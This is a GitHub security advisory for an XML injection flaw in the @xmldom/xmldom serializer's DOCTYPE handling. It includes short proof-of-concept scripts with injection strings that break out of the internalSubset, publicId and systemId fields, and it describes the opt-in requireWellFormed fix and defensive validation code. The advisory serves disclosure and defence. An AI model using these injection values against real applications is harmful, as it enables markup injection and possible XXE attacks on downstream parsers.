CVE-2026-41674
ADVISORY - github
Summary
The package serializes DocumentType node fields (internalSubset, publicId, systemId) verbatim
without any escaping or validation. When these fields are set programmatically to attacker-controlled
strings, XMLSerializer.serializeToString can produce output where the DOCTYPE declaration is
terminated early and arbitrary markup appears outside it.
Details
DOMImplementation.createDocumentType(qualifiedName, publicId, systemId, internalSubset) validates
only qualifiedName against the XML QName production. The remaining three arguments are stored
as-is with no validation.
The XMLSerializer emits DocumentType nodes as:
<!DOCTYPE name[ PUBLIC pubid][ SYSTEM sysid][ [internalSubset]]>
All fields are pushed into the output buffer verbatim — no escaping, no quoting added.
internalSubset injection: The serializer wraps internalSubset with [ and ]. A value
containing ]> closes the internal subset and the DOCTYPE declaration at the injection point.
Any content after ]> in internalSubset appears outside the DOCTYPE in the serialized output as
raw XML markup. Reported by @TharVid (GHSA-f6ww-3ggp-fr8h). Affected: @xmldom/xmldom ≥ 0.9.0
via createDocumentType API; 0.8.x only via direct property write.
publicId injection: The serializer emits publicId verbatim after PUBLIC with no
quoting added. A value containing an injected system identifier (e.g.,
"pubid" SYSTEM "evil") breaks the intended quoting context, injecting a fake SYSTEM entry
into the serialized DOCTYPE declaration. Identified during internal security research. Affected:
both branches, all versions back to 0.1.0.
systemId injection: The serializer emits systemId verbatim. A value containing >
terminates the DOCTYPE declaration early; content after > appears as raw XML markup outside
the DOCTYPE context. Identified during internal security research. Affected: both branches, all
versions back to 0.1.0.
The parse path is safe: the SAX parser enforces the PubidLiteral and SystemLiteral grammar
productions, which exclude the relevant characters, and the internal subset parser only accepts a
subset it can structurally validate. The vulnerability is reachable only programmatically: through
createDocumentType calls with attacker-controlled arguments, or through direct writes of
attacker-controlled values to a DocumentType node's publicId, systemId, or internalSubset properties.
Affected code
lib/dom.js — createDocumentType (lines 898–910):
createDocumentType: function (qualifiedName, publicId, systemId, internalSubset) {
  validateQualifiedName(qualifiedName); // only qualifiedName is validated
  var node = new DocumentType(PDC);
  node.name = qualifiedName;
  node.nodeName = qualifiedName;
  node.publicId = publicId || ''; // stored verbatim
  node.systemId = systemId || ''; // stored verbatim
  node.internalSubset = internalSubset || ''; // stored verbatim
  node.childNodes = new NodeList();
  return node;
},
lib/dom.js — serializer DOCTYPE case (lines 2948–2964):
case DOCUMENT_TYPE_NODE:
  var pubid = node.publicId;
  var sysid = node.systemId;
  buf.push(g.DOCTYPE_DECL_START, ' ', node.name);
  if (pubid) {
    buf.push(' ', g.PUBLIC, ' ', pubid);
    if (sysid && sysid !== '.') {
      buf.push(' ', sysid);
    }
  } else if (sysid && sysid !== '.') {
    buf.push(' ', g.SYSTEM, ' ', sysid);
  }
  if (node.internalSubset) {
    buf.push(' [', node.internalSubset, ']'); // internalSubset emitted verbatim
  }
  buf.push('>');
  return;
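The effect of this branch can be reproduced in isolation with a small stand-in. The sketch below is a simplified model, not the library's code: the function name modelSerializeDoctype is hypothetical, and the literal values used for g.DOCTYPE_DECL_START, g.PUBLIC, and g.SYSTEM are assumptions inferred from the serialized output shown in this advisory.

```javascript
// Simplified model of the DOCTYPE branch above; NOT the library's implementation.
// Assumed literal values for g.DOCTYPE_DECL_START, g.PUBLIC and g.SYSTEM.
const DOCTYPE_DECL_START = '<!DOCTYPE';
const PUBLIC = 'PUBLIC';
const SYSTEM = 'SYSTEM';

// Hypothetical helper: concatenates the fields exactly as given, with no escaping.
function modelSerializeDoctype(node) {
  const buf = [DOCTYPE_DECL_START, ' ', node.name];
  const pubid = node.publicId;
  const sysid = node.systemId;
  if (pubid) {
    buf.push(' ', PUBLIC, ' ', pubid);
    if (sysid && sysid !== '.') buf.push(' ', sysid);
  } else if (sysid && sysid !== '.') {
    buf.push(' ', SYSTEM, ' ', sysid);
  }
  if (node.internalSubset) buf.push(' [', node.internalSubset, ']');
  buf.push('>');
  return buf.join('');
}

const benign = modelSerializeDoctype({
  name: 'root', publicId: '', systemId: '"about:legacy-compat"', internalSubset: '',
});
const hostile = modelSerializeDoctype({
  name: 'root', publicId: '', systemId: '', internalSubset: ']><injected/><![CDATA[',
});
console.log(benign);  // <!DOCTYPE root SYSTEM "about:legacy-compat">
console.log(hostile); // <!DOCTYPE root []><injected/><![CDATA[]>
```

Because the fields are joined as plain strings, whatever delimiter the caller supplies becomes part of the declaration's structure.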
PoC
internalSubset injection
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const doctype = impl.createDocumentType(
  'root',
  '',
  '',
  ']><injected/><![CDATA['
);
const doc = impl.createDocument(null, 'root', doctype);
const xml = new XMLSerializer().serializeToString(doc);
console.log(xml);
// <!DOCTYPE root []><injected/><![CDATA[]><root/>
//                   ^^^^^^^^^^^ injected element outside DOCTYPE
publicId quoting context break
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const doctype = impl.createDocumentType(
  'root',
  '"injected PUBLIC_ID" SYSTEM "evil"',
  '',
  ''
);
const doc = impl.createDocument(null, 'root', doctype);
console.log(new XMLSerializer().serializeToString(doc));
// <!DOCTYPE root PUBLIC "injected PUBLIC_ID" SYSTEM "evil"><root/>
// quoting context broken — SYSTEM entry injected
systemId injection
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
const doctype = impl.createDocumentType(
  'root',
  '',
  '"sysid"><injected attr="pwn"/>',
  ''
);
const doc = impl.createDocument(null, 'root', doctype);
console.log(new XMLSerializer().serializeToString(doc));
// <!DOCTYPE root SYSTEM "sysid"><injected attr="pwn"/>><root/>
// > in sysid closes DOCTYPE early; <injected/> appears as sibling element
Impact
An application that programmatically constructs DocumentType nodes from user-controlled data and
then serializes the document can emit a DOCTYPE declaration where the internal subset is closed
early or where injected SYSTEM entities or other declarations appear in the serialized output.
Downstream XML parsers that re-parse the serialized output and expand entities from the injected DOCTYPE declarations may be susceptible to XXE-class attacks if they enable entity expansion.
Fix Applied
⚠ Opt-in required. Protection is not automatic. Existing serialization calls remain vulnerable unless
{ requireWellFormed: true } is explicitly passed. Applications that pass untrusted data to createDocumentType() or write untrusted values directly to a DocumentType node's publicId, systemId, or internalSubset properties should audit all serializeToString() call sites and add the option.
XMLSerializer.serializeToString() now accepts an options object as a second argument. When { requireWellFormed: true } is passed, the serializer validates the DocumentType node's publicId, systemId, and internalSubset fields before emitting the DOCTYPE declaration and throws InvalidStateError if any field contains an injection sequence:
publicId: throws if non-empty and does not match the XML PubidLiteral production (XML 1.0 [12])
systemId: throws if non-empty and does not match the XML SystemLiteral production (XML 1.0 [11])
internalSubset: throws if it contains ]> (which closes the internal subset and DOCTYPE declaration early)
All three checks apply regardless of how the invalid value entered the node — whether via createDocumentType arguments or a subsequent direct property write.
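For applications that want an equivalent check in their own code, for example before a value ever reaches createDocumentType, the three rules can be approximated as follows. This is a minimal sketch and not the library's implementation: the name findDoctypeProblems and the regular expressions are assumptions written from the XML 1.0 productions [11] to [13], and the sketch assumes publicId and systemId are stored with their delimiting quotes, as in the PoCs above.

```javascript
// Hypothetical application-side check; the library's internal checks may differ.
// PubidLiteral (XML 1.0 [12]) built from PubidChar ([13]); the single-quoted
// form excludes "'" from the allowed characters.
const PUBID_DQ = /^"[\x20\r\na-zA-Z0-9\-'()+,.\/:=?;!*#@$_%]*"$/;
const PUBID_SQ = /^'[\x20\r\na-zA-Z0-9\-()+,.\/:=?;!*#@$_%]*'$/;
// SystemLiteral (XML 1.0 [11]): any characters except the delimiting quote.
const SYSTEM_LITERAL = /^(?:"[^"]*"|'[^']*')$/;

// Returns the names of the fields that would break out of the DOCTYPE declaration.
function findDoctypeProblems(fields) {
  const { publicId = '', systemId = '', internalSubset = '' } = fields;
  const problems = [];
  if (publicId && !(PUBID_DQ.test(publicId) || PUBID_SQ.test(publicId))) {
    problems.push('publicId');
  }
  if (systemId && !SYSTEM_LITERAL.test(systemId)) {
    problems.push('systemId');
  }
  if (internalSubset.includes(']>')) {
    problems.push('internalSubset');
  }
  return problems;
}

const clean = findDoctypeProblems({
  publicId: '"-//W3C//DTD XHTML 1.0 Strict//EN"',
  systemId: '"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"',
});
const hostileFields = findDoctypeProblems({
  publicId: '"injected PUBLIC_ID" SYSTEM "evil"',
  systemId: '"sysid"><injected attr="pwn"/>',
  internalSubset: ']><injected/><![CDATA[',
});
console.log(clean);         // []
console.log(hostileFields); // [ 'publicId', 'systemId', 'internalSubset' ]
```

Returning the list of offending field names rather than throwing leaves it to the caller to reject the input or log it.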
PoC — fixed path
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();
// internalSubset injection
const dt1 = impl.createDocumentType('root', '', '', ']><injected/><![CDATA[');
const doc1 = impl.createDocument(null, 'root', dt1);
// Default (unchanged): verbatim — injection present
console.log(new XMLSerializer().serializeToString(doc1));
// <!DOCTYPE root []><injected/><![CDATA[]><root/>
// Opt-in guard: throws InvalidStateError
try {
  new XMLSerializer().serializeToString(doc1, { requireWellFormed: true });
} catch (e) {
  console.log(e.name, e.message);
  // InvalidStateError: DocumentType internalSubset contains "]>"
}
The guard also covers post-creation property writes:
const dt2 = impl.createDocumentType('root', '', '');
dt2.systemId = '"sysid"><injected attr="pwn"/>';
const doc2 = impl.createDocument(null, 'root', dt2);
new XMLSerializer().serializeToString(doc2, { requireWellFormed: true });
// InvalidStateError: DocumentType systemId is not a valid SystemLiteral
Why the default stays verbatim
The W3C DOM Parsing and Serialization spec §3.2.1.3 defines a require well-formed flag whose default value is false. With the flag unset, the spec permits verbatim serialization of DOCTYPE fields. Unconditionally throwing would be a behavioral breaking change with no spec justification. The opt-in requireWellFormed: true flag allows applications that require injection safety to enable strict mode without breaking existing deployments.
Residual limitation
createDocumentType(qualifiedName, publicId, systemId[, internalSubset]) does not validate publicId, systemId, or internalSubset at creation time. Adding creation-time validation would be a breaking change, so it is deferred to a future breaking release.
When the default serialization path is used (without requireWellFormed: true), all three fields are still emitted verbatim. Applications that do not pass requireWellFormed: true remain exposed.
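Since the protection depends on every call site passing the option, one way to reduce the audit surface is to route serialization through a single helper. The sketch below assumes only the serializeToString(node, options) signature described in this advisory; the name serializeStrict is hypothetical.

```javascript
// Hypothetical wrapper: always enables the opt-in guard described in this advisory.
// `serializer` is expected to be an XMLSerializer instance from a fixed release.
function serializeStrict(serializer, node) {
  return serializer.serializeToString(node, { requireWellFormed: true });
}
```

Call sites would then use serializeStrict(new XMLSerializer(), doc) and handle the InvalidStateError that a malformed DocumentType field raises. On releases without the fix the second argument has no effect, so the helper is only meaningful after upgrading.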
Common Weakness Enumeration (CWE)
XML Injection (aka Blind XPath Injection)